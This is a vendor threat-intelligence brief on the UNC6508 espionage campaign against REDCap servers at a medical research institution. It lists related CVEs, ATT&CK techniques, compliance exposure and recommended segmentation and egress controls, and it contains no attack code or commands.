Executive Summary
Between September 2023 and November 2025, the Chinese state-sponsored group UNC6508 infiltrated vulnerable REDCap servers at a North American medical research institution. They deployed custom malware named Infinitered, which harvested credentials and established a backdoor, enabling prolonged data exfiltration. The attackers exploited REDCap's widespread use in medical research to access sensitive information undetected for over a year.
This incident underscores the persistent threat posed by nation-state actors targeting critical research sectors. The sophisticated methods employed, including the abuse of legitimate features for data exfiltration, highlight the evolving tactics in cyberespionage campaigns.
Why This Matters Now
The UNC6508 breach highlights the urgent need for organizations to secure widely-used platforms like REDCap, as attackers increasingly exploit such tools to access sensitive data. The prolonged undetected access emphasizes the importance of robust monitoring and timely patching to defend against sophisticated cyberespionage threats.
Attack Path Analysis
UNC6508 exploited vulnerable REDCap servers to gain initial access, escalated privileges to obtain administrative credentials, moved laterally within the network, established command and control through a backdoor, exfiltrated sensitive data via email rules, and maintained long-term access to the compromised systems.
Kill Chain Progression
Initial Compromise
Description
UNC6508 exploited vulnerabilities in externally facing REDCap servers to gain initial access.
Related CVEs
CVE-2024-37394
CVSS 5.4Stored cross-site scripting (XSS) vulnerability in REDCap versions prior to 14.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
Affected Products:
Vanderbilt University REDCap – < 14.2.1
Exploit Status:
no public exploitCVE-2024-37395
CVSS 5.4Stored cross-site scripting (XSS) vulnerability in REDCap versions prior to 14.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
Affected Products:
Vanderbilt University REDCap – < 14.2.1
Exploit Status:
no public exploitCVE-2024-37396
CVSS 5.4Stored cross-site scripting (XSS) vulnerability in REDCap versions prior to 14.2.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
Affected Products:
Vanderbilt University REDCap – < 14.2.1
Exploit Status:
no public exploit
MITRE ATT&CK® Techniques
Exploit Public-Facing Application
Command and Scripting Interpreter
Event Triggered Execution: Unix Shell Configuration Modification
OS Credential Dumping
Application Layer Protocol: Web Protocols
Exfiltration Over Web Service: Exfiltration to Cloud Storage
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
NIST SP 800-53 – Flaw Remediation
Control ID: SI-2
PCI DSS 4.0 – System and Software Security
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Data Security
Control ID: Pillar 3: Data
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Health Care / Life Sciences
Primary target with REDCap platform breaches exposing medical research data, requiring HIPAA compliance controls like encrypted traffic and zero trust segmentation.
Higher Education/Acadamia
Universities using REDCap for research face credential harvesting attacks, needing egress security controls and threat detection to protect academic medical studies.
Pharmaceuticals
Drug discovery research vulnerable to espionage campaigns targeting clinical trial data through compromised REDCap servers and email exfiltration techniques.
Government Administration
Military readiness and geo-strategic policy data targeted by Chinese APT groups, requiring multicloud visibility and anomaly detection for defense applications.
Sources
- Chinese hackers breach REDCap servers, steal medical researchhttps://www.bleepingcomputer.com/news/security/chinese-hackers-breach-redcap-servers-steal-medical-research/Verified
- Google exposes China espionage group that’s been lurking in networks undetected since 2023https://cyberscoop.com/google-unc6508-china-espionage-threat/Verified
- Chinese Hackers Target Medical, Military, and AI Research in North Americahttps://www.securityweek.com/chinese-hackers-target-medical-military-and-ai-research-in-north-america/Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have constrained the attacker's ability to move laterally, escalate privileges, and exfiltrate data by enforcing strict segmentation and identity-based access controls.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The attacker's initial access may have been limited to the compromised server, reducing the potential for further exploitation.
Control: Zero Trust Segmentation
Mitigation: The attacker's ability to escalate privileges could have been constrained, reducing the risk of unauthorized access to sensitive systems.
Control: East-West Traffic Security
Mitigation: The attacker's lateral movement within the network could have been restricted, limiting access to additional systems.
Control: Multicloud Visibility & Control
Mitigation: The attacker's ability to establish and maintain command and control channels may have been disrupted, reducing the effectiveness of the backdoor.
Control: Egress Security & Policy Enforcement
Mitigation: The attacker's data exfiltration efforts could have been hindered, reducing the risk of sensitive information being transmitted to external destinations.
The attacker's prolonged access to compromised systems could have been limited, reducing the potential impact on sensitive research data.
Impact at a Glance
Affected Business Functions
- Clinical Data Management
- Research Data Analysis
- Regulatory Compliance Reporting
Estimated downtime: N/A
Estimated loss: N/A
Sensitive medical research data, including clinical trial results and patient information.
Recommended Actions
Key Takeaways & Next Steps
- • Implement Zero Trust Segmentation to restrict lateral movement within the network.
- • Deploy East-West Traffic Security controls to monitor and control internal traffic flows.
- • Utilize Multicloud Visibility & Control to detect and respond to anomalous activities across cloud environments.
- • Enforce Egress Security & Policy Enforcement to prevent unauthorized data exfiltration.
- • Regularly update and patch REDCap servers to mitigate known vulnerabilities.
